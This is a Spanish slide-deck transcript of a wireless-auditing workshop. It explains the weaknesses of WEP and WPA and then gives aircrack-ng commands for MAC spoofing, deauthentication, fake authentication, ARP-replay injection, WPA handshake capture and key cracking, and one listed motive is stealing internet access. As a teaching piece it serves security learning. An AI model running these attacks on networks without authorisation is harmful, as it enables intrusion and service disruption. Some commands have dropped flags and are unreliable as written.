Auditoria Wireless Cracking WEP & WPA keys Jorge Luis Hernandez C. Linux/Aircrack.

Slides:



Advertisements
Presentaciones similares
WI-FI significa Wireless Fidelity. Es un conjunto de especificaciones de comunicación inalámbrica basados en el estándar Estas especificaciones.
Advertisements

Configuración Routers WIFI ADSL
Espacio común de movilidad
Windows Server 2003 Redes Wireless Seguras
Seguridad en Redes Inalámbricas
PROTOCOLOS Y ESTANDARES DE RED
Charla básica penetración y protección Redes Inalámbricas
Unidad 8 Protocolos y Servicios de Red Nivel 2 Protocolo Ethernet
Seguridad en la Red WIFI
Protocolos de seguridad en redes inalámbricas Universidad Carlos III de Madrid Protocolos de Comunicaciones para Sistemas Móviles Saulo Barajas 7jun04.
Tecnologías inalámbricas
Recuperación de la clave WiFi con cifrado WEP
Para realizar la configuración del AP, deberemos de hacer lo siguiente: Configuración del Access Point 1.- colocar la antena al AP. 2.- conectar a la corriente.
Para realizar la configuración del AP, deberemos de hacer lo siguiente: Configuración del Access Point 1.- colocar la antena al AP. 2.- conectar a la corriente.
Como Instalar Un Access Point 2419
Como Instalar Un Access Point
Vulnerabilidades WEP en redes a/b/g David Reguera García.
Tema 4. SEGURIDAD EN REDES INALÁMBRICAS.
Lissette Oteiza María Angélica Seguel Saul Gajardo
“DETECCIÓN DE VULNERABILIDADES EN REDES INALÁMBRICAS 802
 SSH (Secure Shell) es un conjunto de estándares y protocolo de red que permite establecer una comunicación a través de un canal seguro entre un cliente.
Como ocurre habitualmente, lo primero para configurar el punto de acceso es averiguar en los manuales la dirección IP inicial de gestión que le ha asignado.
Redes de área local Unidad 2 O PERACIONES A UXILIARES CON T ECNOLOGÍAS DE LA I NFORMACIÓN Y LA C OMUNICACIÓN.
Taller: Ing. Luis Alberto Ortiz Configuración de Redes Wi-Fi Nivel Inicial.
Inseguridad en redes Wireless Antonio Bernier Moreno Victor M. Vega García Diego Martínez Lomas.
SEGURIDAD EN LA RED CORPORATIVA:. SEGURIDAD EN LAS COMUNICACIONES INALÁMBRICAS.
Seguridad en Redes Universitarias
Octubre de 2006 Seguridad en Wireless ¿Cuáles son los riesgos de seguridad de las redes inalámbricas y de qué maneras pueden reducirse/solucionarse estos.
Seguridad en Redes Wireless. Agenda  Introducción, conceptos y funcionamiento de redes Wireless  Seguridad en  Ataques típicos a redes Wireless.
WPA WI-FI PROTECTED ACCESS José Luis González Uriel Evangelista Fernando Arroyo.
REDES INALAMBRICAS NOMBRE: JOHN SANCHEZ NIVEL: SEXTO “D” PROF.: Ing. ELVA LARA 1.
Configuración de puntos de acceso Puntos de Acceso Desarrollado por: IT +46, Basado en el trabajo original de: Onno W. Purbo and Sebastian Buettrich Traducido.
Universidad de Deusto Facultad de Ingenieria Seguridad en redes Wi-Fi Universidad de Deusto Nuevos protocolos de seguridad en redes Wi-Fi Pablo.
Proyecto De Seguridad En Redes Inalámbricas Realizado por: Rubén Nogales Sánchez Sergio Medrano Castro.
Redes en gnuLinex Configuración de dispositivos Antonio Durán.
Seguridad Inalámbrica ➲ Jordi Badenes 2 SMX. Indice Packet sniffing Pag 3 Nessus Pag 4 Knoppix Pag 5 Aircrack Pag 6 wpa tester Pag 7 xirrus wi-fi inspector.
© 2006 Cisco Systems, Inc. Todos los derechos reservados.Información pública de Cisco 1 Configuración de un router inalámbrico Conmutación y conexión inalámbrica.
DOCENTE: Lic. Juan Araujo Herencia.  El punto de acceso es un dispositivo de capa 2, por intermedio de estos dispositivos, las estaciones Wireless.
REDES INALÁMBRICAS, CONECTIVIDAD EN LAS AIP Y CRT DE LAS IIEE
Servidor de aplicaciones
Paul Leger Modelo OSI Paul Leger
Tema: Análisis de una red trocal multiservicio para encriptación de información sobre MPLS basada en el estándar IETF con el protocolo GETVPN Autor:
Configuración de un switch
UF0854: Instalación y configuración de los nodos de una red local.
Computer Networking: A Top Down Approach, Jim Kurose, Keith Ross.
Capítulo 8, Sección 8.6: IPsec
6. SEGURIDAD WI-FI 21/02/2018.
Capítulo 8 Seguridad en Redes WEP, FW, IDS
Capítulo 8, Sección 8.6: IPsec
Mensaje Segmento Paquete Frame Hola, que tal FCS Hola, que tal
Modelo OSI.
2.5 Seguridad e integridad.
Juan Daniel Valderrama Castro
ARP - Address Resolution Protocol
Conceptos Relacionados Unidad I. Parte A.
David Alejandro Romero Piña
REDES DE DATOS.. Redes de datos. 1.- Conceptos b á sicos de redes Elementos de la comunicación Vías de comunicación Componentes hardware.
CONTROL DE ATAQUES INFORMATICOS
REDES Video 7.
Seguridad en Redes Inalámbricas
MRDE-02 Manejo de Redes.
Universidad Politécnica de Francisco I. Madero Seguridad en redes «Servidores TACACS» M.I. Ernesto García Amaro Hilda Ameyalid Hernández Pérez
Autenticación Unidad 3. La autenticación es un aspecto fundamental de la seguridad de un sistema. Confirmar la identidad de cualquier usuario que intenta.
8.6-1 Capítulo 8, Sección 8.6: IPsec Material basado en el Texto: Computer Networking: A Top Down Approach Featuring the Internet, Jim Kurose, Keith Ross.
2 Es el dispositivo digital lógico de interconexión de equipos que opera en la capa de enlace de datos del modelo OSI. Su función es interconectar dos.
Javier Rodríguez Granados
Pruebas de Seguridad en implementaciones k/v
En la familia de protocolos de Internet UDP proporciona una sencilla interfaz entre la capa de red y la capa de aplicación. UDP no otorga garantías para.
FACULTAD DE INGENIERIA EN SISTEMAS ELECTRONICA E INDUSTRIAL TEMA: i.
Curso Redes (IS20) -Capítulo 5 1 Redes (IS20) Ingeniería Técnica en Informática de Sistemas Práctica 3- Estudio de tráfico sobre LAN
Transcripción de la presentación:

Auditoria Wireless Cracking WEP & WPA keys Jorge Luis Hernandez C. Linux/Aircrack

@lesthack Contenido Introducción WEP WPA Practicas Part 1

@lesthack Contenido Introducción WEP WPA Practicas Razones por las cuales tomé el taller ● Me interesa conocer las herramientas de seguridad. ● Me interesa saber los algoritmos de Encriptación WEP y WPA. ● Quisiera saber como protegerme de Ataques de este tipo ● Quiero aprender a romper claves WEP y WPA para robarme el internet.

@lesthack Contenido Introducción WEP WPA Practicas Objetivo ● Se conocerán las vulnerabilidades de seguridad de los protocolos de transmisión WEP y WPA frente a ataques de fuerza bruta y probabilidad y estadística. ● Se trabajará con herramientas de Testeo como Aircrack bajo ambientes GNU/Linux ● Se conocerán los medios de protección que compliquen la explotación de las vulnerabilidades de las claves WEP y WPA.

@lesthack WEP ● Significado: ● WEP != Wireless Encryption Protocol ● WEP = Wired Equivalent Privacy ● Sistema de cifrado incluido en el Estándar IEEE como protocolo para redes Wireless ● Se propone como alternativa de confidencialidad frente a las comunicaciones de cableado en 1999 ● Se usa en dispositivos de transmisión wireless casera. Ejemplo de ello son los dispositivos 2wire de Teléfonos de México. WEP ¿ Que es ? Función Vulnerabilidad

@lesthack WEP ● En el 2001 se explotan fácilmente las debilidades de WEP. ● La IEEE crea una corrección de seguridad i para neutralizar los problemas. ● En el 2003 Wi-Fi anuncia el remplazo de WEP por Wi-Fi Protected Access (WPA). ● En el 2004 la alianza Wi-Fi revoca WEP-40 y WEP-104 por serios fallos de seguridad. WEP ¿ Que es ? Función Vulnerabilidad

@lesthack WEP ● Se basa en el algoritmo de cifrado RC4 que utiliza claves de ● 64 bits (40 bits mas 24 bits del Vector de iniciacion IV) ● 128 bits (104 bits mas 24 bits del IV) ● 256 bits (232 bits mas 24 bits del IV) WEP ¿ Que es ? Función Vulnerabilidad

@lesthack WEP ● Funciona expandiendo una semilla (seed) para generar una secuencia de números pseludo- aleatorios de mayor tamaño bajo la operación XOR. ● No se debe usar la misma semilla para cifrar dos mensajes diferentes. ● WEP especifica un Vector de Iniciación (IV) de 24 bits que se modifica regularmente y se concatena a la contraseña (Esta es la semilla) WEP ¿ Que es ? Función Vulnerabilidad

@lesthack WEP ¿ Que es ? Función Vulnerabilidad

@lesthack WEP ¿ Que es ? Función Vulnerabilidad RC4

@lesthack WEP ● Con la captura de n número de paquetes, es posible y por algoritmos estadísticos, obtener la clave WEP. ● Colisión de IV's. ● Alteración de Paquetes. WEP ¿ Que es ? Función Vulnerabilidad

@lesthack WPA ● Es un sistema para proteger las redes inalámbricas (Wi-Fi); creado para corregir las deficiencias del sistema previo WEP. ● WPA usa autenticación de usuarios mediante un servidor, se almacenan las credenciales y contraseñas. ● Implementa el Protocolo de Integridad de Clave Temporal (TKIP - Temporal Key Integrity Protocol), cambia claves dinámicamente. WPA ¿ Que es ? Vulnerabilidad

@lesthack WPA ● Implementa un código de integridad del mensaje (MIC - Message Integrity Code). ● Incluye protección contra ataques de "repetición". WPA ¿ Que es ? Vulnerabilidad

@lesthack WPA ● WPA-PSK ● Mucho mas segura que WEP. ● Usa un Algoritmo RC4 como WEP. ● Basado en el Protocolo TKIP (Temporal Key Integrity Protocol) que cambia la clave dinamicamente. ● Menos segura que WPA con Autenticación en Servidor. WPA ¿ Que es ? Vulnerabilidad

@lesthack WPA ● WPA con Autenticación en Servidor ● En la que es el servidor (RADIUS) de autentificación el encargado de distribuir claves diferentes entre los usuarios. ● Mucho mas segura que WPA-PSK. ● Complicada para configurar para usuario doméstico. WPA ¿ Que es ? RADIUS: Remote Authentication Dial-In User Server Vulnerabilidad

@lesthack WPA2 ? ● Lo mismo que WPA, es el estándar avanzado de cifrado (AES) en vez de TKIP. ● Corrige las vulnerabilidades de WPA. ● El estándar cumple con los requerimientos de seguridad del gobierno de USA. ● No todos los dispositivos lo soportan. WPA ¿ Que es ? Vulnerabilidad

@lesthack WPA ¿ Que es ? Vulnerabilidad

@lesthack aircrack Practicas WEP Practica WPA Part 2

@lesthack aircrack Herramientas ● Herramientas a usar: ● Aircrack 1.0 rc3 ● Macchanger ● Terminator Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack aircrack Herramientas ● Debian {derivados [Ubuntu, Backtrack 4]} ● apt-get install aircrack macchanger terminator Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack aircrack Herramientas ● Aircrack es una suite de seguridad wireless integrado por: ● Packet Sniffer ● Cracker WEP y WPA ● Diversas Utilerías ● Uso: ● # aireplay-ng Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack aircrack Herramientas ● Conceptos: ● SSID [Service Set Identifier] – BSSID [Basic Service Set Identifier] – ESSID [Extended Service Set Identifier] ● Interfaz: – Dispositivo asociado al hardware en sistemas *nix ● Channel: – Canal de transferencia, regularmente asociado a la frecuencia. Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack aircrack Herramientas ● Opciones de aireplay ● # aireplay-ng – -b bssid : Dirección MAC del punto de acceso – -d dmac : Dirección MAC de destino – -s smac : Dirección MAC origen (source) – -m len : Longitud mínima del paquete – -n len : Longitud máxima del paquete – -u type : frame control, type field – -v subt : frame control, subtype field – -t tods : frame control, To DS bit – -f fromds : frame control, From DS bit – -w iswep : frame control, WEP bit Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack aircrack Herramientas ● Opciones de inyección ● -x nbpps : número de paquetes por segundo ● -p fctrl : fijar palabra frame control (hexadecimal) ● -a bssid : fijar dirección MAC del AP ● -c dmac : fijar dirección MAC de destino ● -h smac : fijar dirección MAC origen ● -e essid : ataque de falsa autenticación: nombre del AP ● -j : ataque arp-replay: inyectar paquetes FromDS ● -g valor : cambiar tamaño de buffer (default: 8) ● -k IP : fijar IP de destino en fragmentos ● -l IP : fijar IP de origen en fragmentos ● -o npckts : número de paquetes por burst (-1) ● -q sec : segundos entre paquetes sigo aquí o keep- alives (-1) ● -y prga : keystream para autenticación compartida (shared key) Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack aircrack Herramientas ● Abrimos Terminator en modo root ● Alt + F2 ● Escribimos terminator ● Cambiamos a modo root ● $ sudo su ● $su [si usas debian] ● Modificamos Split's al antojo Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack aircrack Herramientas ● Vemos interfaces Generales ● # ifconfig ● Vemos interfaces Wireless ● # iwconfig ● Bajos interfaz ● # ifconfig interface down ● Cambiamos MAC ● # macchanger -r wlan0 ● Levantamos interfaz ● # ifconfig interface up Instalación Fundamentos Cambiando MAC Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack aircrack Herramientas ● Modo Monitor: ● # airmon-ng start wlan0 Instalación Ataque 0 Ataque 1 Ataque 2 Ataque 3 Cambiando MAC Fundamentos Modo Monitor

@lesthack aircrack Herramientas ● Deauthentication Attack ● Este ataque envia paquetes de desasociación a uno o más clientes que están actualmente asociados a un punto de acceso. – Recuperar o desvelar un ESSID oculto. Este es un ESSID que no es divulgado o anunciado por el AP. – Capturar handshakes WPA/WPA2 forzando a los clientes a volverse a autenticar. – Generar peticiones ARP (en Windows, algunas veces, los clientes borran su “ARP cache” cuando son desconectados). Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack aircrack Herramientas ● Uso: ● # aireplay-ng a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0 – -0 significa deautenticación – 1 es el número de deautenticaciones a enviar (puedes enviar todas las que quieras); 0 significa enviarlas continumente – -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso – -c 00:0F:B5:34:30:30 es la dirección MAC del cliente a deautenticar; si se omite serán deautenticados todos los clientes – ath0 es el nombre de la interface Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack aircrack Herramientas ● Fake Autentication ● El ataque de falsa autenticación permite realizar los dos tipos de autenticación WEP (abierta u “Open System” y compartida o “Shared Key”) y asociarse con el punto de acceso (AP). ● Esto es muy útil cuando necesitamos una dirección MAC asociada para usarla con alguno de los ataques de aireplay-ng y no hay ningún cliente asociado. ● Se debe tener en cuenta que el ataque de falsa autenticación NO genera ningún paquete ARP. Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack aircrack Herramientas ● Uso: ● # aireplay-ng e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 – -1 significa falsa autenticación – 0 tiempo de reasociación en segundos – -e teddy es el nombre de la red wireless – -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso – -h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta – ath0 es el nombre de la interface wireless ● Variaciones: – aireplay-ng o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack Crack WPA aircrack Herramientas ● Capturar: ● # airodump-ng -c 9 –bssid 00:11:22:33:44:55 -w psk ath0 ● Desautenticar cliente para capturar HandShake: ● # airodump-ng a 00:14:6C:7E:40:80 -c 00:0F:85:FD:FB:C2 ath0 ● Crackeando clave ● # aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack aircrack Herramientas ● Interactive Packet Reply ● Este ataque nos permite escoger el paquete a reenviar (inyectar). ● Puede obtener paquetes para inyectar de 2 formas. – La primera es capturando paquetes con la tarjeta wireless. – La segunda es utilizando un archivo cap. Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack aircrack Herramientas ● Uso: ● # aireplay-ng -2 -r – -2 significa ataque de reenvio interactivo – – -r se usa para especificar un archivo cap del que leer los paquetes para inyectarlos (es opcional) – es la interface wireless, por ejemplo ath0 ● Ejemplo: ● # aireplay-ng -2 -p c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0 Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack aircrack Herramientas ● Request Injection ● El clásico ataque de reenvio de petición ARP o “ARP request” es el modo más efectivo para generar nuevos IVs (vectores de inicialización), y funciona de forma muy eficaz. ● El programa escucha hasta encontrar un paquete ARP y cuando lo encuentra lo retransmite hacia el punto de acceso. ● Esto provoca que el punto de acceso tenga que repetir el paquete ARP con un IV nuevo. ● El programa retransmite el mismo paquete ARP una y otra vez. Pero, cada paquete ARP repetido por el AP tiene un IV nuevo. Todos estos nuevos IVs nos permitirán averiguar la clave WEP. Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack aircrack Herramientas ● Uso: ● # aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0 – -3 significa reenvio estandard de petición arp (arp request) – -b 00:13:10:30:24:9C es la dirección MAC del punto de acceso – -h 00:11:22:33:44:55 es la dirección MAC origen (de un cliente asociado o de una falsa autenticación) – ath0 es el nombre de la interface wireless Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor

@lesthack aircrack Herramientas ● Crackeando los paquetes ● # aircrack-ng paquetes.ivs Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor